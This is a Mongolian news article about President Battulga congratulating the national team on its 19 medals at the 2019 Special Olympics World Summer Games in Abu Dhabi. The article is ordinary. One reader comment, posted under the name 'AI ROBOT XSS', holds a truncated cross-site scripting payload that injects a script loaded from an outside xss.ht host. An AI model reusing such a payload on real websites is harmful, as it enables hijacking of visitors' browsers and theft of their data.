Ерөнхийлөгч тусгай олимпын зуны наадамд амжилттай оролцсон баг тамирчдыг хүлээн авч уулзав | News.MN

Ерөнхийлөгч тусгай олимпын зуны наадамд амжилттай оролцсон баг тамирчдыг хүлээн авч уулзав

Ерөнхийлөгч тусгай олимпын зуны наадамд амжилттай оролцсон баг тамирчдыг хүлээн авч уулзав

Ерөнхийлөгч тусгай олимпын зуны наадамд амжилттай оролцсон баг тамирчдыг хүлээн авч уулзав

Арабын Нэгдсэн Эмират улсын Абу Даби хотноо оюуны бэрхшээлтэй хүмүүсийн тусгай олимпын зуны наадам энэ сарын 8-22-ны өдрүүдэд болж өнгөрсөн юм. Монгол Улсаас энэ олимпод 28 тамирчин оролцож 3 алт, 7 мөнгө, 9 хүрэл медаль хүртсэн бахдам амжилттай иржээ.

Оюуны бэрхшээлтэй хүмүүсийн тусгай олимпын зуны наадамд оролцсон Монголын баг, тамирчдыг Монгол Улсын Ерөнхийлөгч Х.Баттулга хоёрдугаар сарын 28-ны өдөр хүлээн авч уулзсан бөгөөд энэ үеэрээ тэдэнд амжилт хүсч, олимпын нээлтэд мандуулах Монгол Улсын төрийн далбааг гаруулан өгч байсан юм.

Харин өнөөдөр Монгол Улсын Ерөнхийлөгч Х.Баттулга тэднийг олимпын наадамд амжилттай оролцож ирсэнд нь баяр хүргэн, хүлээн авч уулзлаа. Энэ үеэрээ Төрийн тэргүүн Засгийн газраас медаль хүртсэн тамирчдад мөнгөн урамшуулал олгож байгааг сайшаан, оюуны бэрхшээлтэй хүмүүсийн дунд зохиогдох аливаа тэмцээн, уралдаанд төр, засгаас санхүүгийн дэмжлэг үзүүлж байх ёстой хэмээн цохон тэмдэглэлээ.

Мөн 192 орны 7500 гаруй тамирчин оролцсон олимпын наадмаас 19 тамирчин медаль хүртсэн нь өндөр үзүүлэлт гээд олимпын цикл хоорондын тэмцээн, уралдаанд оролцож, амжилт үзүүлэхийг зорих хэрэгтэй хэмээн багш, дасгалжуулагчдад зөвлөлөө.

Уулзалтын үеэр хүүхдүүд олимпын наадамд оролцсон талаарх сэтгэгдлээ хуваалцаж, Монгол Улсын Ерөнхийлөгчтэй дурсгалын зураг авахуулав.

Арабын Нэгдсэн Эмират улсын Абу Даби хотноо болсон оюуны бэрхшээлтэй хүмүүсийн тусгай олимпын зуны наадмын багц мэдээллийг унших бол дарна уу.

Эх сурвалж: PRESIDENT.MN

"Болор дуран"-аар шалгав.
Энэ мэдээнд өгөх таны сэтгэгдэл?
0
ЗөвЗөв
0
ХахаХаха
0
ХөөрхөнХөөрхөн
0
ГайхмаарГайхмаар
0
ХарамсалтайХарамсалтай
0
ТэнэглэлТэнэглэл
0
БурууБуруу
Баярлалаа!

Холбоотой мэдээ

2 сэтгэгдэл

News.mn сайтад сэтгэгдэл оруулахад анхаарах зүйлс

Avatar

AI ROBOT XSS 2019-03-25 182.160.32.109

"><iframe srcdoc="<script>var a=parent.document.createElement("script");a.src="https://bicktivism.xss.ht";parent.docum

Avatar

ЗОЧИН 2019-03-25 150.129.141.152

хүн гэдэг бусад амьтнаас "илүү ухаантай амьтан буюу хүнийг дэмжсэн рөнхийлөгч-дээ баярлалаа.

NewsMN Гар утасны хувилбар Татах
NEWS.mn

Мэдээллийн эх сурвалж